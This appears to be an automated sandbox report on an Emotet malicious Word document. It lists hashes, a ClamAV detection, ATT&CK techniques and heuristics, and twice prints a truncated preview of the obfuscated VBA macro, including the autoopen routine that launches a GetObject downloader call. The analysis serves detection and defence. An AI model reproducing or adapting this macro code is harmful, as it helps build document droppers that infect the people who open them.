Emotet Office (OLE) malware analysis — malicious · 3c0a8897217f08f9

MALICIOUS

Office (OLE)

184.9 KB Created: 2019-03-29 07:33:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 8fc202c4277ead539f93f951fa3fa6a9 SHA-1: ec2d7cad789c685e9543050e886df493157cbabe SHA-256: 3c0a8897217f08f931054d45798d6d7450a3fcb854016c34469df3bbf8328c73

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6916023-0, strongly suggesting the Emotet family. The presence of an AutoOpen VBA macro that utilizes GetObject indicates the macro is designed to execute a payload, likely a downloader for a second-stage artifact. The embedded URL, though benign, is a common characteristic of such documents.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6916023-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6916023-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26170 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	26170 bytes
SHA-256: `a2dbd1a2ba231d1ae29331a76e4f44c5ee86c69b078ec31c6a9e4b038bae1529`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "OABDAA4B" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "WAQGQ_A" Attribute VB_Base = "0{F78B3326-73C5-49FA-83B1-F914BD7BCED9}{76C56B2B-F667-46EB-A4CB-9CA2B2A26779}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "YxAAAAA" Attribute VB_Base = "0{E8AB5339-ABEA-475F-967A-7478265F5E51}{2E746637-CF13-4006-B4BA-07560D47BAFC}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "wAUkUkwC" Function bAGQcZQ() If nkUAkDkB = dUBGGAG Then Set WDDwZA = Y4wAZACU kxCBCwAU = tADAB_U - 793041893 - 678518978 + Log(912702890 - Atn(r_AcGoD / OoACwAB + ODxAxxwA / Tan(892972071))) * (9805233 + Sgn(844868100 / Sin(tQkXZAcB))) Set cA4BAUA = iAABQDA End If If YAxAA4wo = vQX_4_D Then Set wAAUCABo = BkABAABD tAAAC4CX = oA1oADU - 623682577 - 88326582 + Log(187652900 - Atn(jcZQAcBG / zDAAAA + ZAADkU / Tan(814735075))) * (765239317 + Sgn(288893129 / Sin(z1wAAA))) Set WDcDA_GG = hA1oQU End If End Function Function rkUZG44() If QBQA4ADD = iA4ZkG Then Set jxCZAU = oA4XwD toAQAB = cX_BXQAD - 499542368 - 430068787 + Log(833316797 - Atn(rAAAAAA_ / ZXA4wwAA + GCBACc / Tan(476432))) * (604807402 + Sgn(243641689 / Sin(NoAAD1AA))) Set SQACUQ = HDZAZooC End If If NUAkAUA = zBAQA_A Then Set SDBAQADA = KoxAA_Dc nooACCZD = wAQAAD - 991857155 - 123257249 + Log(915056874 - Atn(fB4wACBQ / XkGA__ZX + PwAU_kU / Tan(612874817))) * (561123561 + Sgn(467696617 / Sin(SDkA1B))) Set w1DZQAk1 = YCDUAUQ End If If bxCwoB = cxwBAQ Then Set EDZAAGZx = fAAAZU aDUAAcAc = nBGBZA - 407577260 - 715352754 + Log(505597967 - Atn(rQAGBcDA / sCcACA1 + EAAD1UA / Tan(38370891))) * (548844692 + Sgn(219063213 / Sin(tDAGBQkw))) Set DkGooGQ = GUx_QBAA End If End Function Sub autoopen() dX1AxA End Sub Function dX1AxA() On Error Resume Next If rABAk44 = NQC1ok Then Set DAACQAA = OAAGXAG BZUkUQw = VAkAA4 - 474084368 - 294512251 + Log(318978175 - Atn(DXAAGAo / DAAGUDA + RkAABAXA / Tan(647041776))) * (605079216 + Sgn(456131464 / Sin(iGAUBUQ_))) Set WoxQAAw = aDcoUU4 End If If KwXAkA = ucAxoA Then Set w4ZAAZ = voDCkx lADDBQx = jXQAAA - 449876047 - 468306839 + Log(868991172 - Atn(LCxUZAA / uAoQx1A + jXBBABAX / Tan(123270619))) * (158819329 + Sgn(542486386 / Sin(N4UXQQU))) Set SAAUQAA = OAUAXAG End If Set hU4w_A = GetObject(WAQGQ_A.oDA4Ao4.ControlSource + YxAAAAA.lDwBAB4 + WAQGQ_A.oDA4Ao4.ControlTipText) If LGAAAAAx = SAAwcUAX Then Set m14GBD = I1CUXUB PUoAAA = zDwAADA - 464750075 - 53565047 + Log(955061135 - Atn(z4_AoB / i4DDAQQQ + zoUXox / Tan(818091502))) * (174085200 + Sgn(827388599 / Sin(MkACAAU))) Set CCDABAcB = dADQxAGA End If If WAAxAQ = tQAQAD Then Set DcAcGAZD = EQAAAZkB kCwABAZ = nCAAACB - 285121965 - 408145712 + Log(487130502 - Atn(PQUAQAkw / w1AXkAC + G4cUAADA / Tan(814222785))) * (731319692 + Sgn(217045064 / Sin(M4AABoD))) Set kQDckD_ = Q1QUAAAZ End If If mZAQAAD = T1GUQ_BA Then Set vcAXBBww = qBQQAXAQ DcAABG = QUxAXZU - 601914844 - 79381524 + Log(307534097 - Atn(DAAAXAZA / qxABAAA + HAGAAAc / Tan(380049161))) * (293734612 + Sgn(388563309 / Sin(RBBxAA))) Set CXU_CA = R4_CGCAG End If If 244778 = 244778 Then If ToCAQAA = BBAX1B Then Set EGUAXQAo = bQUUZA_ nGwBAoAG = VQUDAAQA - 784054506 - 167861156 + Log(93894239 - Atn(dUoGoADx / z4woAQo + AAQUBU / Tan(40677750))) * (464975096 + Sgn(742242790 / Sin(mAUoAA1w))) Set cUUUA_k = UAocxAAc End If If QkUZBc = kAXDXG Then Set wcQAUw_Q = MDUoDA GAw_AA = rAAwGAB - 983278805 - 892256856 + Log(834086417 - Atn(jkABAZ / TBDQZBBU + iAUAD1w / Tan(121687673)) ... (truncated)

SHA-256: a2dbd1a2ba231d1ae29331a76e4f44c5ee86c69b078ec31c6a9e4b038bae1529

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "OABDAA4B"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WAQGQ_A"
Attribute VB_Base = "0{F78B3326-73C5-49FA-83B1-F914BD7BCED9}{76C56B2B-F667-46EB-A4CB-9CA2B2A26779}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "YxAAAAA"
Attribute VB_Base = "0{E8AB5339-ABEA-475F-967A-7478265F5E51}{2E746637-CF13-4006-B4BA-07560D47BAFC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wAUkUkwC"
Function bAGQcZQ()
   If nkUAkDkB = dUBGGAG Then
Set WDDwZA = Y4wAZACU
kxCBCwAU = tADAB_U - 793041893 - 678518978 + Log(912702890 - Atn(r_AcGoD / OoACwAB + ODxAxxwA / Tan(892972071))) * (9805233 + Sgn(844868100 / Sin(tQkXZAcB)))
Set cA4BAUA = iAABQDA
End If
   If YAxAA4wo = vQX_4_D Then
Set wAAUCABo = BkABAABD
tAAAC4CX = oA1oADU - 623682577 - 88326582 + Log(187652900 - Atn(jcZQAcBG / zDAAAA + ZAADkU / Tan(814735075))) * (765239317 + Sgn(288893129 / Sin(z1wAAA)))
Set WDcDA_GG = hA1oQU
End If
End Function
Function rkUZG44()
   If QBQA4ADD = iA4ZkG Then
Set jxCZAU = oA4XwD
toAQAB = cX_BXQAD - 499542368 - 430068787 + Log(833316797 - Atn(rAAAAAA_ / ZXA4wwAA + GCBACc / Tan(476432))) * (604807402 + Sgn(243641689 / Sin(NoAAD1AA)))
Set SQACUQ = HDZAZooC
End If
   If NUAkAUA = zBAQA_A Then
Set SDBAQADA = KoxAA_Dc
nooACCZD = wAQAAD - 991857155 - 123257249 + Log(915056874 - Atn(fB4wACBQ / XkGA__ZX + PwAU_kU / Tan(612874817))) * (561123561 + Sgn(467696617 / Sin(SDkA1B)))
Set w1DZQAk1 = YCDUAUQ
End If
   If bxCwoB = cxwBAQ Then
Set EDZAAGZx = fAAAZU
aDUAAcAc = nBGBZA - 407577260 - 715352754 + Log(505597967 - Atn(rQAGBcDA / sCcACA1 + EAAD1UA / Tan(38370891))) * (548844692 + Sgn(219063213 / Sin(tDAGBQkw)))
Set DkGooGQ = GUx_QBAA
End If
End Function
Sub autoopen()
dX1AxA
End Sub
Function dX1AxA()
On Error Resume Next
   If rABAk44 = NQC1ok Then
Set DAACQAA = OAAGXAG
BZUkUQw = VAkAA4 - 474084368 - 294512251 + Log(318978175 - Atn(DXAAGAo / DAAGUDA + RkAABAXA / Tan(647041776))) * (605079216 + Sgn(456131464 / Sin(iGAUBUQ_)))
Set WoxQAAw = aDcoUU4
End If
   If KwXAkA = ucAxoA Then
Set w4ZAAZ = voDCkx
lADDBQx = jXQAAA - 449876047 - 468306839 + Log(868991172 - Atn(LCxUZAA / uAoQx1A + jXBBABAX / Tan(123270619))) * (158819329 + Sgn(542486386 / Sin(N4UXQQU)))
Set SAAUQAA = OAUAXAG
End If
Set hU4w_A = GetObject(WAQGQ_A.oDA4Ao4.ControlSource + YxAAAAA.lDwBAB4 + WAQGQ_A.oDA4Ao4.ControlTipText)
   If LGAAAAAx = SAAwcUAX Then
Set m14GBD = I1CUXUB
PUoAAA = zDwAADA - 464750075 - 53565047 + Log(955061135 - Atn(z4_AoB / i4DDAQQQ + zoUXox / Tan(818091502))) * (174085200 + Sgn(827388599 / Sin(MkACAAU)))
Set CCDABAcB = dADQxAGA
End If
   If WAAxAQ = tQAQAD Then
Set DcAcGAZD = EQAAAZkB
kCwABAZ = nCAAACB - 285121965 - 408145712 + Log(487130502 - Atn(PQUAQAkw / w1AXkAC + G4cUAADA / Tan(814222785))) * (731319692 + Sgn(217045064 / Sin(M4AABoD)))
Set kQDckD_ = Q1QUAAAZ
End If
   If mZAQAAD = T1GUQ_BA Then
Set vcAXBBww = qBQQAXAQ
DcAABG = QUxAXZU - 601914844 - 79381524 + Log(307534097 - Atn(DAAAXAZA / qxABAAA + HAGAAAc / Tan(380049161))) * (293734612 + Sgn(388563309 / Sin(RBBxAA)))
Set CXU_CA = R4_CGCAG
End If
If 244778 = 244778 Then
   If ToCAQAA = BBAX1B Then
Set EGUAXQAo = bQUUZA_
nGwBAoAG = VQUDAAQA - 784054506 - 167861156 + Log(93894239 - Atn(dUoGoADx / z4woAQo + AAQUBU / Tan(40677750))) * (464975096 + Sgn(742242790 / Sin(mAUoAA1w)))
Set cUUUA_k = UAocxAAc
End If
   If QkUZBc = kAXDXG Then
Set wcQAUw_Q = MDUoDA
GAw_AA = rAAwGAB - 983278805 - 892256856 + Log(834086417 - Atn(jkABAZ / TBDQZBBU + iAUAD1w / Tan(121687673))
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.